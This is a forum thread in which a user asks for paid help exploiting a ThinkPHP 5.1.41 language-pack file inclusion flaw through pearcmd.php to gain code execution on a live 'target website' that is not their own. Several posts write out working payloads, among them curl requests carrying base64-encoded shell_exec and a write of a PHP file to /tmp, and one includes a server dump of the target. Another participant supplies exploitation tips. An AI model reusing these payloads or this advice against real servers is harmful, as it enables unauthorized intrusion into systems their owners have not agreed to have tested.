Help! RCE with pearcmd through a LFI vulnerability

[cazra]

Hi everyone

A website I am targeting right now is based on thinkphp v5.1.41 and has a language pack so it's exposed to that vulnerability: Thinkphp 多语言 RCE - 跳跳糖.
And that example here shows an execution using the local pearcmd.php.

I'm trying locally in a VM with a dummy thinkphp v5.1.41 deployment, but I can't for the life of me make the RCE work.
Even that simple injection

curl -X GET "http://127.0.0.1:8000/?lang=../../../../../usr/share/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC90b3RvCg==\"));?>" --http1.1

just does not do anything and ends up in

[2024-06-06T23:38:30+08:00] 127.0.0.1 GET 127.0.0.1:8000/?lang=../../../../../usr/share/php/pearcmd&config-create%20/tmp/pear.ini%20/
[ error ] [0]Fatal error: Cannot use object of type PEAR_Error as array

Anyone has any tips? Can talk about $$

 

[Admin]

Are sure that you do have installed and testing on any of those Thinkphp vulnerable versions ( v6.0.1~v6.0.13，v5.0.x，v5.1.x ). ?

 

[cazra]

Hey, thanks for the help.

Yes, I am working my way thru v5.1.41.

I start from

git clone https://github.com/top-think/think.git think_git; cd think_git; git checkout v5.1.41

Then that's my composer characteristics

    "require": {
        "php": ">=5.6.0",
        "topthink/framework": "5.1.41",
        "topthink/think-orm": "^2.0"
    },

and the composer lock confirms

...
            "name": "topthink/framework",
            "version": "v5.1.41",
            "source": {
...

And I do have the langpack "on" in this testing version

    'lang_switch_on'         => true,

.

Except if I am missing something?

 

[Tyrell Wellick]

Except if I am missing something?

The payload you're using seems to be targeting the pearcmd.php file for LFI and subsequent code execution. Ensure that the path to pearcmd.php file is present and accessible at the specified path.

The payload should be URL-encoded properly, /usr/share/php/pearcmd&+config-create+/&/<?php shell_exec(base64_decode('...............

The error message you received indicates an issue with the PEAR_Error object. This suggests that the pearcmd.php file might not be behaving as expected in this context. If the pearcmd.php method is not working, you can try another known exploitation, like using the call_user_func_array
Note: Ensure that there are no network restrictions or firewalls blocking the request.

 

[cazra]

Hey, thanks for the answer and for the help

Running the thinkphp website locally simpy through

 php think run

does not seem to expose the exploit, but putting it in a container and running it properly with Apache exposes the vulnerability as expected. Thanks, i can experiment now to build the right payload.

The target website seems to be served with nginx, hope it does not change anything.

 

[cazra]

Hi again everyone!

Asking yet another question just in the hope that someone has more clarity than me.

In the test env, with a v5.1.41 thinkphp server,

http://127.0.0.1:8080/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/%3C?phpinfo();?%3E+/tmp/hello.php

works without issues when the lang pack is on. When the lang pack is off, the extra query params have no effect, and the normal landing page appears.

On the target website, when I inject the same payload

curl -X GET "website.com/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/%3C?phpinfo();?%3E+/tmp/hello.php" --http1.1

it just does not return **anything**.
In the browser, going to "website.com/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/%3C?phpinfo();?%3E+/tmp/hello.php" just redirects to "website.com/usr/local/lib/php/pearcmd&+config-create+/&/%3C?phpinfo();?%3E+/tmp/hello.php" and displays an HttpException "module does not exists: usr".
I tried adding more "../" to make sure I go back to the root, but same exception.

Here is the dump from the browser display (note the website2.com vs. the website.com -- the server is not in the same domain as the client it would seem (?))

Server/Request Data
USER    www
HOME    /home/www
FCGI_ROLE    RESPONDER
SCRIPT_FILENAME    /www/wwwroot/website2.com/website2.com/public/index.php
QUERY_STRING    s=/usr/local/lib/php/pearcmd%26%2Bconfig-create%2B/%26/%3C&phpinfo();?%3E+/tmp/hello.php
REQUEST_METHOD    GET
CONTENT_TYPE  
CONTENT_LENGTH  
SCRIPT_NAME    /index.php
REQUEST_URI    /usr/local/lib/php/pearcmd&+config-create+/&/%3C?phpinfo();?%3E+/tmp/hello.php
DOCUMENT_URI    /index.php
DOCUMENT_ROOT    /www/wwwroot/website2.com/website2.com/public
SERVER_PROTOCOL    HTTP/2.0
REQUEST_SCHEME    https
HTTPS    on
GATEWAY_INTERFACE    CGI/1.1
SERVER_SOFTWARE    nginx/1.22.1
REMOTE_ADDR    34.133.121.146
REMOTE_PORT    58272
SERVER_ADDR    168.76.20.20
SERVER_PORT    443
SERVER_NAME    website2.com
REDIRECT_STATUS    200
PATH_INFO  
HTTP_HOST    website.com
HTTP_UPGRADE_INSECURE_REQUESTS    1
HTTP_USER_AGENT    Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
HTTP_ACCEPT    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
HTTP_SEC_FETCH_SITE    none
HTTP_SEC_FETCH_MODE    navigate
HTTP_SEC_FETCH_USER    ?1
HTTP_SEC_FETCH_DEST    document
HTTP_SEC_CH_UA    "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
HTTP_SEC_CH_UA_MOBILE    ?0
HTTP_SEC_CH_UA_PLATFORM    "Linux"
HTTP_ACCEPT_ENCODING    gzip, deflate, br, zstd
HTTP_ACCEPT_LANGUAGE    en-US,en;q=0.9
HTTP_PRIORITY    u=0, i
PHP_SELF    /index.php
REQUEST_TIME_FLOAT    1718005426.338
REQUEST_TIME    1718005426

Thanks mates

 

[cazra]

Hi everyone!

I haven't found a solution but I know that the best are around here, so I am bumping this thread.

I'd be grateful if anyone had a solution!